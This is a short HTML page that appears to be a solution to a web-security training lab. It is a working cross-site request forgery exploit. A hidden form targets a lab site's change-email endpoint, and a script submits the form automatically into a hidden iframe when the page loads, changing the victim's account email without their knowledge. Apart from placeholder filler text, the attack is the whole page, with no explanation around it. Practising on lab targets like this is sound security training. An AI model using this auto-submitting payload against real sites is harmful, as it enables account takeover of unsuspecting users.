<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Test</title>
  </head>
  <body>
    <h1>cyber securityy</h1>
    <p>fijrijfjgi</p>

    <small
      >v uiehuencueruydcisunhelimrunhg rc</small
    >
    <iframe style="display: none" name="csrf-iframe"></iframe>
    <form
      action="https://0a6200d704b8816881ba9d75001f007c.web-security-academy.net/my-account/change-email"
      method="POST"
      target="csrf-iframe"
      id="csrf-form"
    >
      <input type="hidden" name="email" value="test@google.com" />
    </form>

    <script>
      document.getElementById("csrf-form").submit();
    </script>
  </body>
</html>
